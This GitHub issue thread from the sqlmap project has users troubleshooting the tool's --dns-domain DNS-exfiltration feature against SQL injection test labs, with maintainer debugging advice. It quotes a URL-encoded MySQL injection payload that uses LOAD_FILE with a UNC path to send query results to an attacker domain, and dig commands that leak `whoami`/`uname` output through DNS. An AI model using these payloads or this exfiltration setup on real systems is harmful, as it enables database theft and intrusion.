### ISSUE TITLE
sqlmap --dns-domain Parameter error problem?

### ISSUE THREAD

**Issue by Aasron** [sqlmapproject/sqlmap#3078]
Locally build sqli-labs platform for testing, injection point is sure to exist.

Build DNS server in the middle to read log with sqlmap's DNS-Domain parameter.

But I encountered a more exotic problem. Whenever I run the sqlmap parameter, I will prompt when retrieving the DNS channel.
![GitHub Logo](https://i.stack.imgur.com/JIOqP.png)

DNS failed to retrieve the data and closed the DNS filter, but in building the communication, the DNS server actually received a log on my side, meaning that the 53 port was listening to the data for a long time.

1.dns platform is certainly no problem (that is, it can receive query data). 
2. the iptables that has closed the sqlmap running machine 
3. the test machine is windows, so you can use the UNC path.
4.After the following test, the most important thing is that when I test the payload statement manually, I can receive the DNS log normally, but when using the --dns-domain of sqlmap, it will stop at "setting up DNS server instance" or "data retrieval through). Iltration support

Ask the great God to point out!
Thanks!

**Comment by stamparm** [comment]
`the DNS server actually received a log on my side` <- nothing else than sqlmap should listen on port 53. sqlmap is playing the DNS server, while you are having your own DNS server instance listening. If this is not the case please do a proper debugging before replying

**Comment by Aasron** [comment]
Yes, I did exactly what you said.

**Comment by stamparm** [comment]
p.s. rerun sqlmap with `-v 3`, use the payload (DNS exfiltration) being used just before the failed message and run it inside the browser (or Burp). Then listen on *:53 for incoming DNS requests. If they come, check that you are not running anything else on *:53. If they don't come, check what is wrong with the payload(s) in the first place (it shouldn't be too hard to spot if anything is wrong) OR if your DNS A/NS setup is correct in the first place

**Comment by Aasron** [comment]
If I manually or take advantage of mysql's client, or use burp to send DNS to me once, I will try or check other problems. I can't ask for more advice. Thanks.

**Comment by Aasron** [comment]
I have checked the DNS NS/A record configuration, and using burpsuite and other tools to observe sqlmap's payload request, still can not find the problem, it seems no way, but it is true that when the DNS MySQL injection article on the Internet is handmade to send payload to the log, it is very helpless.

**Comment by stamparm** [comment]
I am confused. You are saying that payload is ok, that the DNS responses are coming back from those same payloads, but that somehow sqlmap can't detect those responses? Or something totally different?

By debugging this kind of stuff I really hoped that you'll use the sqlmap's payload and run it manually so you could come to some conclusion (e.g. payload is being run, DNS response is being triggered and passed to the NS declared machine where sqlmap is running, but sqlmap doesn't capture it...)

**Comment by Aasron** [comment]
Yes, DNS can receive logs when the payload is tested with the sqlmap, and the payload of the sqlmap is different each time, but the sqlmap cannot detect these responses.

**Comment by Aasron** [comment]
I see someone before and I meet the same problems and questions address is: https://github.com/sqlmapproject/sqlmap/issues/1788, I think I should be the same problem with him

**Comment by Aasron** [comment]
I've seen a question before, and that person and I have the same situation. #1788

**Comment by Aasron** [comment]
Hello, through a variety of tests after I found a problem, when I use the manual to test or use to write your own scripts to get the data, through the DNS server receives data, using sqlmap execution to the first statement to determine whether or not normal communication, I the DNS server will only receive the first communication, then sqlmap prompt payload testing communication failure, because sqlmap using DNS - domain parameters, each time to test whether can normal communication, so I think this is a BUG

**Comment by Aasron** [comment]
But I doubt most is, my friends and I are used in the same way to realize the DNS injection, he succeeded, but I failed, the DNS server configuration, and payload statements are the same

**Comment by stamparm** [comment]
Please attach here the PCAP where it is visible that the sqlmap is sending the payload (that testing payload) and where the response is visible inside the DNS traffic.

I've kindly asked you to debug the problem (inside the traffic itself).

p.s. I've tested the mechanism one month ago and everything was working properly

**Comment by Aasron** [comment]
1.I set up a Windows server exists injection point web site, there is no firewall can be determined, and other factors, because I have already bought three different parts of the VPS and tested four domain name, is the same problem
2.I found in a burp observation payload, use "-- - domain DNS" parameters and I called python sqlmap/lib/request/DNS. Py data of 53 port to monitor, found the query only once and the DEBUG debugging information is also say so, so I look for reason, found the sqlmap will be called only once "the load_file" to load the unc path, the back of the payload will turn into a normal bb query statements, So will prompt "data retrieval through DNS channel failed. Turning off DNS exfiltration support
![wx1](https://user-images.githubusercontent.com/17878407/39581732-d578e0a6-4f1e-11e8-9689-8a647e81aba3.jpg)
![wx2](https://user-images.githubusercontent.com/17878407/39581765-e6f91378-4f1e-11e8-933d-4995644c600e.jpg)

So please god tell me why, or did I get it wrong?

**Comment by Aasron** [comment]
I observed with wireshark, and I did find that I only checked the NS/A record once, and my NS/A configuration had no problems.

Because friend previously wrote an article about sqlmap tutorial to use - DNS - domain parameters, through him for a few days of testing and I found this strange problem, he can't give me a more detailed answer, so I want to ask to ask

**Comment by Aasron** [comment]
I used a machine that wasn't related to the test, which was the equivalent of the victim checking my domain name server and listening to DNS data.
![wx4](https://user-images.githubusercontent.com/17878407/39582864-6f02b01a-4f21-11e8-9e46-872a1f2dad4d.png)
This allows you to see access to the data and the DNS is in a communication state.
However, when using the sqlmap - DNS -domain parameter, DNS does not return any data, but using netstat -ano to view the port, it finds that the 53 port is open.

![wx5](https://user-images.githubusercontent.com/17878407/39583176-148b98bc-4f22-11e8-9f9e-faaaf0be314c.jpg)

**Comment by crossmxn** [comment]
Hi stamparm, I'm having the same problem. I have pointed my domain ns1 and ns2 to my DigitalOcean VPS IP.

If I do a "tcpdump -n -i any port 53" **on the VPS** and visit test1.mydomain.com on **my computer** browser I can see following traffic **on my VPS:**

16:05:36.021711 IP 74.125.45.12.64846 > MyVpsIP.53: 758% [1au] A? test1.mydomain.com. (58)

Howerver, when I run sqlmap I get "[17:00:01] [ERROR] data retrieval through DNS channel failed. Turning off DNS exfiltration support"

This is the POST data being sent when sqlmap tries to check if DNS exfiltration is working "iduser=1%20AND%206688%3DIF%28%28ORD%28MID%28%28SELECT%20LOAD_FILE%28CONCAT%280x5c5c5c5c7554492e%2C%28SELECT%20HEX%28MID%28%28IFNULL%28CAST%287260%20AS%20CHAR%29%2C0x20%29%29%2C1%2C31%29%29%29%2C0x2e6a6f672e63726f73736375742e78797a5c5c6f4a6750%29%29%29%2C3%2C1%29%29%3E349%29%2CSLEEP%285%29%2C6688%29&status=1"

Which are the requirements for this function to work besides having the port 53 open and no being used by another application? Any thoughts? Thanks for your time stamparm

**Comment by stamparm** [comment]
I this case you've posted that same MySQL DNS payload works ONLY against Windows OS

**Comment by secretpwner** [comment]
plz help me i have same problem
did you solve this problem? I need help.

VPS: ``allow tcp,udp/53``
a.com: `` *, ns1, ns2 <- 3 A Records Point to VPS IP``
bbb.com: `` Custom DNS (Name Servers): ns1.a.com, ns2.a.com``

on VPS: ``sudo tcpdump -n -i any port 53``

on MyPC: ``dig foobar.com @bbb.com  `` 
on VPS: ``15:21:25.173094 IP 173.194.168.66.48186 > 172.31.9.142.53: 25668% [1au] A? bbb.com. (52)``

on MyPC: ``dig foobar.com @test.bbb.com  `` 
on VPS: ``15:28:41.522752 IP 172.253.236.5.42519 > 172.31.9.142.53: 52068% [1au] A? test.bbb.com. (54)``

on MyPC: ``dig bbb.com NS``
on VPS: ``;bbb.com.	IN	NS``

on MyPC: ``dig test.a.com A``
on VPS: ``test.a.com.	31	IN	A	[VPS IP]``

and i try to test server (Windows + SQL Server)
on VPS: ``data retrieval through DNS channel failed. Turning off DNS exfiltration support``

need help i can't solve this..

**Comment by stamparm** [comment]
@secretpwner you are doing the wrong set of tests.

until you are able to capture the `dig foobar.yourdomain.com` at your VPS (where you would like to run the sqlmap), you won't be able to utilize `--dns-domain`.

in DNS exfiltration there is no `@` pointing to the server under your control. only thing that is pointing to you are the NS records for `yourdomain.com`.

please do not reply with "I've already set proper NS records" as I can see from your tests that you've done `dig foobar.com @bbb.com ` instead of `dig foobar.yourdomain.com` (<-without the `@`)

**Comment by secretpwner** [comment]
@stamparm  First of all, thank you very much for answering my questions.
I waited enough time (2 day) and i tried it again and write this reply.

``until you are able to capture the dig foobar.yourdomain.com at your VPS (where you would like to run the sqlmap), you won't be able to utilize --dns-domain.``
Yes, I run tcpdump just for capture testing, and of course i shutdown tcpdump when I run sqlmap.

``only thing that is pointing to you are the NS records for yourdomain.com.``
Yes. Only ``*`` A Records of ``a.com`` is pointing to VPS
And, I set Custom DNS of ``bbb.com`` is pointing to ``ns1.a.com, ns2.a.com``

and i try

``dig `whoami`.bbb.com``
on VPS: ``08:31:08.792001 IP 172.217.42.11.39090 > 172.31.9.142.53: 58686% [1au] A? {USERNAME}.bbb.com. (64)``

``dig `uname`.bbb.com``
on VPS: ``08:44:44.545178 IP 172.253.238.1.48938 > 172.31.9.142.53: 63420% [1au] A? Darwin.bbb.com. (59)``

Finally I exit tcpdump, run sqlmap and it will detect packets on port 53.
``python3 sqlmap.py (...) --dns-domain='bbb.com'``
but still ``data retrieval through DNS channel failed. Turning off DNS exfiltration support``

**Comment by stamparm** [comment]
1) there is no need to shutdown `tcpdump` on host where you run `sqlmap`. for proper debugging you should keep it running in one of terminals
2) run sqlmap with `--dns-domain` and watch for the `tcpdump` on port 53 (everything on same host)
3) until you get DNS requests looking something like `596f6f3773686f6e706f68446535746f.<yourdomain>` on that same host where you run `sqlmap --dns-domain`, your setup will be wrong
4) there should be no service listening on `::53` (e.g. `dnsmasq`) on that same host where you run sqlmap

I hope that you understand the basic concept here

**Comment by stamparm** [comment]
you can also run `sqlmap` with -v 3 or higher to see what payloads does it send. With those same payloads you could try to "debug" as follows:

1) on your VPS (where you plan to run `sqlmap --dns-domain`) run `tcpdump -n -A -i any port 53`
2) on your target run the payload you've seen that sqlmap is trying to send

if you are not able to capture those same DNS requests from the target, then you should find out what's wrong in the whole setup

**Comment by secretpwner** [comment]
@stamparm 
Thank you so much for kindly answering my annoying, maybe stupid questions.

After listening to your answers, I have tried various tests for a long time.
Everything works perfectly on the newly installed server!

Thank you very much for your kind answers to my questions!
